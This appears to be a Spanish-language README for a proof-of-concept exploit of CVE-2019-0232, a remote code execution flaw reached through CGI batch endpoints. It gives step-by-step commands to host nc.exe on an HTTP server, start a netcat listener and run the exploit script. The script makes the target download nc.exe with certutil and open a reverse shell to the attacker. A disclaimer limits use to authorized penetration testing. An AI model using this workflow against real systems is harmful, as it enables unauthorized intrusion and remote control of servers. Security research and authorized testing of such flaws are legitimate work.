
Exploit basado en /jaiguptanick/CVE-2019-0232
PoC para RCE no autenticado a través de endpoints CGI batch. Descarga nc.exe en el objetivo usando certutil y desencadena una reverse shell.
1. Servir nc.exe (en el mismo directorio donde esté nc.exe):
python3 -m http.server 80
2. Inicia tu listener:
nc -lvnp 1234
3. Ejecuta el exploit:
python3 exploit.py \
--url http://:/cgi/.bat \
--server-ip \
--server-port 80 \
--nc-ip \
--nc-port 1234
| Argumento | Requerido | Por defecto | Descripción |
|---|
--url | ✅ | — | URL completa del objetivo con el endpoint CGI |
--server-ip | ✅ | — | Tu IP que sirve nc.exe vía HTTP |
--server-port | ❌ | 80 | Puerto para el servidor HTTP |
--nc-ip | ✅ | — | Tu IP del listener Netcat |
--nc-port | ✅ | — | Tu puerto del listener Netcat |
Solo para pruebas de penetración autorizadas y fines educativos.